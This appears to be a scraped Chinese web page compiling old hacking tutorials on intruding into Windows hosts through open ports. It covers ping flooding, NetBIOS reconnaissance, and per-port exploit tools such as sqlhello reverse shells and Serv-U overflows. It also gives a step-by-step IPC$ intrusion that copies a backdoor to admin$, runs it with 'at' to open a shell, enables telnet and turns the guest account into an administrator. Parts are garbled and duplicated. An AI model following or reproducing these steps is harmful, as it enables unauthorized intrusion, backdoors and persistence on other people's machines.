4899过滤器(菲优特过滤器)
- 电商
- 2022-04-25 03:19:07
怎么通过端口进行入侵?
首先,ping it是一个用来检查网络是否通畅或者网络连接速度的命令。作为生活在网络上的管理员或黑客,ping命令是必须掌握的第一个DOS命令。它使用的原理如下:网络上的所有机器都有唯一的IP地址。当我们向目标IP地址发送数据包时,对方会返回同样大小的数据包。根据返回的数据包,我们可以确定目标主机的存在,并初步判断目标主机的操作系统。我们来看看它的一些常见操作。先看帮助。类型:ping/?在DOS窗口中。进入。中显示的帮助屏幕。在这里,我们只能掌握一些基本的、有用的参数(下同)。-t表示数据包将持续发送到目标IP,直到我们强制它停止。试想一下,如果你用的是100M宽带接入,目标IP是56K的小猫,那么用不了多久,目标IP就会因为承受不了这么多数据而掉线。呵呵,一次攻击就这么简单。-l定义发送包的大小,默认为32字节。我们可以用它来定义最大值为65,500字节。结合上面提到的-t参数,会有更好的效果。-n定义向目标IP发送数据包的次数,默认情况下为3。如果网速慢,三次会浪费我们很多时间,因为现在我们的目的只是判断目标IP是否存在,所以我们定义为一次。请注意,如果-t参数与-n参数一起使用,ping命令将基于以下参数,例如" ping IP -t -n 3 "。虽然使用了-t参数,但它不会一直ping,而只会ping 3次。另外,ping命令不一定要ping IP,也可以直接ping主机域名,这样就可以获得主机的IP。下面举个例子来说明具体用法。这里time=2是指从发送一个包到接收并返回一个包的时间是2秒,由此可以判断网络连接速度。从TTL的返回值可以初步判断ping主机的操作系统。“初步判断”的原因是这个值可以修改。这里TTL=32表示操作系统可能是win98。(小知识:如果TTL=128,说明目标主机可能是Win2000;如果TTL=250,目标主机可能是Unix。)至于ping命令的使用,可以快速查找局域网故障,快速搜索最快的QQ服务器,ping别人.这些都取决于你。二。nbtstat此命令使用NETBIOS显示TCP/IP和当前TCP/IP连接的协议统计信息。使用该命令,可以获得远程主机的NetBIOS信息,如用户名、所属的工作组、网卡的MAC地址等。这里我们需要知道几个基本参数。-a使用该参数,只要知道远程主机的机器名,就可以得到它的NETBIOS信息(下同)。-A这个参数也可以获取远程主机的NETBIOS信息,但是你需要知道它的IP。-n列出本地计算机的NETBIOS信息。当你获取了对方的IP或者机器名,就可以使用nbtstat命令进一步获取对方的信息,增加了我们入侵的保险系数。第三,netstat这是一个用于检查网络状态的命令。操作简单,功能强大。-a检查本地机器所有开放的端口,可以有效发现和防范木马,知道机器开放的服务等信息。这里可以看到,本地机器有FTP服务、Telnet服务、mail服务、WEB服务等。用法:netstat -a IP。-r列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。4.tracert跟踪路由信息。使用这个命令,我们可以找出数据从本地机器传输到目标主机的所有途径,这对我们了解网络布局和结构非常有帮助。在这里,数据从本地机器传输到192.168.0.1机器,没有任何中转,这意味着两台机器在同一个局域网中。用法:tracert IP。
2必须掌握的八个cmd命令(本人收藏)V. net这个命令是网络命令中最重要的一个。你必须彻底掌握它的每个子命令的用法,因为它的功能如此强大,简直是微软为我们提供的最佳入侵工具。首先,我们来看看它有哪些子命令,键入net/?进入。在这里,我们重点介绍入侵中常用的几个子命令。Net使用这个命令来查看远程主机的所有共享资源。命令格式是网络视图IP。Net使用暗指远程主机的一个共享资源作为本地站点符号,图形界面很好用,呵呵。命令格式是net使用x: IPsharename。上面这个表示共享名magic为192.168.0.5IP的目录映射到本地Z盘。以下表示与192.168.0.7建立IPC$连接(net use IP IPC $ " password "/user : " name ")。IPC$连接建立后,呵呵,可以上传文件了:nc.exe 92 . 168 . 0 . 7 admin $,意思是本地目录下的nc.exe可以传到远程主机,结合后面要介绍的其他DOS命令就可以实现入侵。Net使用它来启动远程主机上的服务。在您与远程主机建立连接后,如果您发现它的某些服务没有启动,并且您想使用该服务,您应该怎么办?只需使用此命令启动它。用法:net start servername,成功启动了telnet服务。网络入侵后发现远程主机的某个服务碍事怎么办?停止使用该命令是可以的。用法与net start相同。净使用
r 查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。 1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。 2,net user abcd /del,将用户名为abcd的用户删除。 3,net user abcd /active:no,将用户名为abcd的用户禁用。 4,net user abcd /active:yes,激活用户名为abcd的用户。 5,net user abcd,查看用户名为abcd的用户的情况。 net localgroup 查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法: net localgroup groupname username /add。 现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用 net user abcd来查看他的状态。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。 net time 这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time IP。 3 必须掌握的八个cmd命令(自己的收藏) 六、at 这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command computer。 表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。 七、ftp 大家对这个命令应该比较熟悉了吧?网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放 ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。 首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入"help"来查看帮助(任何DOS命令都可以使用此方法查看其帮助)。 大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。 首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入"open 主机IP ftp端口"回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍。 用户名和密码都是ftp,密码是不显示的。当提示**** logged in时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。 接下来就要介绍具体命令的使用方法了。 dir 跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。 cd 进入某个文件夹。 get 下载文件到本地机器。 put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么 利用就不多说了,大家就自由发挥去吧。 delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。 bye 退出当前连接。 quit 同上。 八、telnet 功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以 administrator身份连接了远程机器后,就可以用它来干你想干的一切了。下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息。 然后在提示符下键入open IP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的。 当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了。
怎么扫描端口啊?入侵技术!
各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后 SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 经典IPC$入侵 11.4779端口 s扫描器 加远程控制任我行
局域网内网入侵
我查拉135端口端口说明:135端口主要用于使用RPC(Remote Procere Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。 端口漏洞:相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒,该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。 1:用139端口入侵 我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。 用到两个NET命令,下面就是这两个命令的使用方法 NET VIEW? 作 用:显示域列表、计算机列表或指定计算机的共享资源列表。? 命令格式:net view [\\computername | /domain[:domainname]]? 参数介绍:? <1>键入不带参数的net view显示当前域的计算机列表。? <2>\\computername 指定要查看其共享资源的计算机。? <3>/domain[:domainname]指定要查看其可用计算机的域? NET USE? 作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。? 命令格式:net use [devicename | *] [\\computername\sharename[\volume]]? [password | *]] [/user:[domainname\]username] [[/delete] |? [/persistent:{yes | no}]]? 参数介绍:? 键入不带参数的net use列出网络连接。? devicename指定要连接到的资源名称或要断开的设备名称。? \\computername\sharename服务器及共享资源的名称。? password访问共享资源的密码。? *提示键入密码。 /user指定进行连接的另外一个用户。? domainname指定另一个域。? username指定登录的用户名。? /home将用户连接到其宿主目录? /delete取消指定网络连接。? /persistent控制永久网络连接的使用。? C:\net use \\IP C:\net view \\IP 我们已经看到对方共享了他的C,D,E三个盘 我们要做的是使用NBTSTAT命令载入NBT快取. c:\>nbtstat –R 载入NBT快取 c:\>nbtstat –c 看有无载入NBT快取 现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。 2:4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3:80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。 4:serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 5: 554端口 用real554.exe入侵。 6:6129端口 用DameWare6129.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 经典IPC$入侵 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名 ,输入administrators,命令即可成功完成。 2. C:\> srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的 c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊. 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备 开始下面的命令。 6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的 是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打 算建立一个Telnet服务!这就要用到ntlm了 7.C:\> ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这 个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使 用"net start telnet"来开启Telnet服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作 一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我 们可以用guest再次访问这台计算机) http://page.zhongsou.com/p?w=各个端口的入侵.%20&k;=5lala&aid;=B0100019074不算太复杂的!
- 人参与,0条评论
发表评论